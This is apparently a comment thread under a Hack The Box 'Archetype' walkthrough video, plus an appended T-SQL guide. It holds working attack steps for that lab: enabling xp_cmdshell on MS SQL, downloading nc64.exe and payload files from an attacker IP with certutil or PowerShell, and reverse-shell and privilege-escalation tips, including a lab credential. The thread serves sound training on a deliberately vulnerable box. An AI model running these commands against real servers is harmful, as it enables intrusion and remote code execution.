Your videos are so damn good man. I would pay for this content. Between the Practical Ethical Hacking course from TCM Security, and watching and taking notes during these videos, I have learned soo much. Thank you so much for creating such great content and doing it in a way that is approachable to people learning about this. You are an amazing resource in this community. I wish I lived overseas so I could buy you a pint!
Just finished this one. I was surprised to see that the intended solution was to spawn a reverse shell! When I got access to the MS SQL server I noticed I could still run dir with the xp_cmdshell so I dir'ed my way through the whole thing 😂
This is my first run through of this box. Having a hard time understanding the binary download and install, and the reverse shell. I am following the walkthrough PDF and nowhere does it mention Metasploit, but you are using it in your video. Do you have another video where you follow the walkthrough PDFs?
Hey, I don't have another video of it unfortunately.. I probably have other videos that do the same / similar, but I've lost track at this stage. The beauty of hacking is there's almost always a variety of tools/techniques you can use to achieve the same objective 😉
Following the steps to a T, with evil-winrm I get: Error: An error of type Errno::ECONNREFUSED happened, message is Connection refused - Connection refused - connect(2) for "{TUN0_IP}" port 5985 ({TUN0_IP}:5985) Error: Exiting with code 1 (the same two errors repeat a second time). How do I get past this?
Many thanks. Wasn't sure how to use the SQL commands but your video was ridiculously helpful again. I knew *what* I wanted to do, just wasn't sure how! Anyway, wget wouldn't work for me using Pwnbox but "certutil -urlcache -f *IP:port*/file.exe file.exe" did, in case anyone has any problems trying to chain wget in the PowerShell commands. I found the password myself also, but it wasn't listed the same as for you; it was way above. I actually stopped following once I got my files uploaded as you'd helped me enough. Many thanks once again, and I expect I'll be saying this again as I progress and find myself stuck 👍🏻👍🏻👍🏻
Hi Mate... Hope you are doing good... You have done a real hard work to customize and categorize all the payloads... If possible... can you share the Payloads which you have categorized... it help us to explore more information by pointing to the right payloads... Hope you got my point... Thanks in Advance...😊
Just a heads up, wget wasn't working for me on the host machine. I tried with: xp_cmdshell "powershell -c cd C:\Users\Public; certutil -urlcache -f IP:PORT/payload.exe payload.exe" and that was buggy as well.
Thank you very much for the walkthrough. I have learnt so much! Please keep on doing the wonderful work. I would like to ask some noob questions: Why can't we log in as administrator with mssqlclient but are able to log in with psexec or evil-winrm? They are all connecting to port 1433. I cannot understand the difference. When I tried to use psexec to log in as sql_svc, it showed the SMB files, stating not writable. This confused me with smbclient.
Thank you 🙏🥰 There are some differences with the ports, e.g. mssql = 1433; psexec = 135, 445 (SMB); winrm = 5985, 5986. As for why we can't log in as administrator with mssqlclient, a couple of possibilities come to mind: depending on the config, mssql may or *may not* use Windows authentication (the admin password may be different); there could be some config options preventing admin from logging in. Finally, the SMB with sql_svc: presumably permissions are configured to prevent that user from writing to shares.
@@_CryptoCat Thank you very much for the information! Given the configuration of the system is unknown, can you give a few hints on how you identify which tools to use in a more realistic hacking situation? Because without hints, I would try logging in with smbclient or mssqlclient but not psexec and go nowhere. Sorry for asking a very broad question.
You'll pick up things to remember as you go, but when you run out of things to try, just crawl the web looking for info about the ports/services you've identified. HackTricks is a good place to start (go through all the steps for each open port/service) and for Windows: book.hacktricks.xyz/windows-hardening/active-directory-methodology. Look for "OSCP cheatsheets", e.g. github.com/oncybersec/oscp-enumeration-cheat-sheet, liodeus.github.io/2020/09/18/OSCP-personal-cheatsheet.html etc.
Just ran through this recently, and winPEAS did not return the file containing the admin password as demonstrated. The file didn't exist on the system for some reason. I had to use RoguePotato to get to the admin flag. Just a heads up in case someone hits the same wall I did.
Btw guys, I couldn't upload the payload file to the target, so I saw a comment and then opened the Python web server again, but with port 80 this time, and this time it worked.
What an amazing walkthrough. I love the way you teach us. I want to ask you where you got all these vulnerability payloads and scripts, any GitHub repository? Please share!
I do be trying. Been on this for a week now because neither psexec nor meterpreter processes are working, because the SQL terminal just seems to hang. Webup is showing the wget success code 200, but that's about as far as I'm getting into the process (winPEAS and payload.exe show a length of 0 when I use -c cd C:/Users/Public; dir). I can see the file, but it looks garb. Not quite sure where these issues lie yet.
Hi mate! Firstly, check if the VPN console output hints at any issues. Also, make sure you can see your VPN IP when you run "ifconfig". If that's all good, a few things you could try: restart VPN; restart VM; regenerate VPN connection pack; try a different box (see if it's machine specific); check the firewall isn't blocking. Otherwise, I would check the HTB forum/Discord or reach out to tech support. Good luck! 🤞
At 8:00: Impacket comes preinstalled (or apt install impacket), so you don't have to go through all of this. Simply do impacket-mssqlclient -S host -u user
I think I have a solution... after you ran enable_xp_cmdshell, did you run RECONFIGURE to install? After that I struggled to connect my HTTP server to Metasploit but realised I had been using my actual IP address instead of the OpenVPN one I am connected to for HTB. Hope this helps. @CryptoCat Love the vids bro, makes such a nice change from an American accent :')
I can't remember these machines too well, but check out this thread on the HTB forum, maybe your answer will be in there 🙂 forum.hackthebox.com/t/starting-point-login-failed-for-user-archetype-guest/2667
For anyone with similar issues, I think the solution here is you have to escape the \ character, so it should be ARCHETYPE/\sql_svc:M3g4c0rp123@{IP ADDRESS}
Appreciate all that you do! Can you please identify how you acquired all of the scripts located at 13:17. Not "payloadsallthethings" but the items located in your "scripts" folder. Thank you!
@@_CryptoCat Thank you! As often stated "I don't know what I don't know". Just wanted to make sure that I wasn't missing something somewhere. Is it possible to post the contents of the scripts folder on your GitHub? I think it would be very helpful for those starting out...which I assume is the majority of your audience.
Not for HTB but sometimes I do write-ups to go along with videos for CTF challs: github.com/Crypto-Cat/CTF. For HTB specifically, you can check the official PDF walkthrough that comes with the starting point machines 😉
Hey, I'm having trouble with the wget. I tried different ways to download too, but I get the 200 code and then, after a long while, the Windows server just gives me a timeout without actually downloading the file. When I dir, it has 0 bytes.
Oh mister holy hackerman. What do I do when I can't transfer the payload because wget says it doesn't exist? On my listener it shows a message that the server used the GET command, error 404 file not found. What did I do wrong? I followed your video exactly. :(
OK so wget has successfully made a request for the payload to your local web server. If you are getting 404 file not found, probably the payload name is incorrect or you don't have the payload in the same directory that you started the python HTTP server. Check that and let me know if you don't get it 🙂
@@_CryptoCat That did the trick. I tested to see if the filename was wrong, but I didn't know that the Python server needed to be in the same directory as the file. I assumed that the thing in msfconsole was the one sending and the Python server was just listening to see any error codes.
You should run mssqlclient.py from your machine, e.g. Kali/Parrot. In case you don't have the script, you can install it with "python3 -m pip install impacket", more details here: github.com/SecureAuthCorp/impacket
At 28:17 I got the same error, but I don't know where the meterpreter shell is located for me because I don't have your scripts folder. My scripts are all in their default folders for Kali. So I'm not able to upload winpeasx64.exe because I don't know the directory on my local host for it. Happen to have any ideas by chance? Thank you!
Hi mate, you can try and search for winPEAS like "locate winpeas". I don't think it comes with Kali though, so you probably need to download it: github.com/carlospolop/PEASS-ng/tree/master/winPEAS
@CryptoCat oh sorry. I found the path to it, but the upload command with the correct path doesn't yield a directory with meterpreter. For me it's /home/kali/usr/share/winpeas/. However, that gives the same error when I try the file path.
xp_cmdshell "powershell -c cd C:/Users/Public/Downloads; wget 10.10.14.54/nc64.exe -outfile nc64.exe" gives error 400 file not found. Help, I've tried everything. I already put the file everywhere and it doesn't send the file to the other side, it always gives the same error, omg.
File not found sounds to me like it's not finding "nc64.exe" on your 10.10.14.54 server. Do you have a web server running in the same directory as the nc64.exe file?
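The file-transfer problems in the thread above (xp_cmdshell not enabled or not reconfigured, wget hanging, 0-byte files, 404s from the Python server, using the LAN IP instead of the tun0 IP) all come down to a short sequence of T-SQL statements. The block below is an added example written for this page; it is not code from the video, the HTB walkthrough PDF, or any of the commenters. It is the raw T-SQL that a helper such as mssqlclient.py's enable_xp_cmdshell issues, followed by a download and a verification step, typed into an MS SQL session as sql_svc. The attacker address 10.10.14.54, port 80 and the file name nc64.exe are assumptions for illustration (the same values one commenter happened to use); substitute your own tun0 IP and file, and serve the file's directory with "python3 -m http.server 80" before running step 4.

```sql
-- Added example (not from the video or the comments): getting a file onto the
-- target through xp_cmdshell from an mssqlclient.py session as sql_svc.
-- Assumed values: attacker tun0 IP 10.10.14.54, HTTP server on port 80 started
-- in the directory that contains nc64.exe.

-- 1. xp_cmdshell is off by default. Each sp_configure change only takes effect
--    after RECONFIGURE, so the statement is needed twice.
EXEC sp_configure 'show advanced options', 1;
RECONFIGURE;
EXEC sp_configure 'xp_cmdshell', 1;
RECONFIGURE;

-- 2. Confirm the setting is live before chasing download errors:
--    run_value must be 1, not just config_value.
EXEC sp_configure 'xp_cmdshell';

-- 3. Sanity check: which account do the commands run as, and does the
--    target directory exist?
EXEC xp_cmdshell 'whoami';
EXEC xp_cmdshell 'dir C:\Users\Public';

-- 4. Download. Use the full http:// URL and the tun0 address (the address the
--    target can route to), never the LAN IP of your attacking VM.
--    certutil is a good fallback when the PowerShell wget alias hangs.
EXEC xp_cmdshell 'certutil -urlcache -split -f http://10.10.14.54/nc64.exe C:\Users\Public\nc64.exe';

--    Equivalent using PowerShell (wget is an alias of Invoke-WebRequest); the
--    T-SQL string is single-quoted so double quotes can be used inside it.
EXEC xp_cmdshell 'powershell -c "Invoke-WebRequest -Uri http://10.10.14.54/nc64.exe -OutFile C:\Users\Public\nc64.exe"';

-- 5. Verify the transfer completed: the size shown must match the file on your
--    machine. A 0-byte entry means the request reached the server (the 200 you
--    see in the http.server log) but the body never arrived; a 404 in that log
--    means the server was started in a directory that does not contain the file.
EXEC xp_cmdshell 'dir C:\Users\Public\nc64.exe';

-- Caveat: xp_cmdshell waits for the spawned process to exit, so a command that
-- never returns (a reverse shell, a listener) blocks the SQL session until the
-- process ends. That is expected behaviour, not a broken connection.
```

If step 2 still shows run_value 0, the account lacks the permission to change server configuration and xp_cmdshell will not be available from this session; if step 5 shows the right size but the binary still will not run, check whether an endpoint product on the target removed or quarantined it after the download.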